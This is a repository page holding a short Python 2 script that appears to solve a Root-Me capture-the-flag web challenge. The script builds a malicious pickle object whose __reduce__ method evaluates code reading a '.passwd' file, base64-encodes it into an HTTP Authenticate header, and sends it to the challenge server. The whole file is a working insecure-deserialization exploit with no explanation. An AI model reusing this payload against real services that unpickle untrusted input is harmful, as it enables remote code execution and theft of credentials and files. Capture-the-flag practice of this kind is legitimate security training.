valentin/Hacks
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
Hacks/rootme/challenges/web-serveur/pickle/pickle_hack.py

23 lines
520 B
Python
Raw Blame History

import socket
import base64
import pickle
host = 'challenge02.root-me.org'
port = 60005
class Exploit(object):
def __reduce__(self):
return (eval, ('eval(file("/challenge/app-script/ch5/.passwd", "r").read())',))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
obj = Exploit()
req = '''AUTH admin HTTP/1.0\r\nAuthenticate: %s\r\n\r\n''' % base64.b64encode(pickle.dumps(obj))
sock.send(req)
res = sock.recv(4096)
while res:
print res
res = sock.recv(4096)
Reference in New Issue View Git Blame Copy Permalink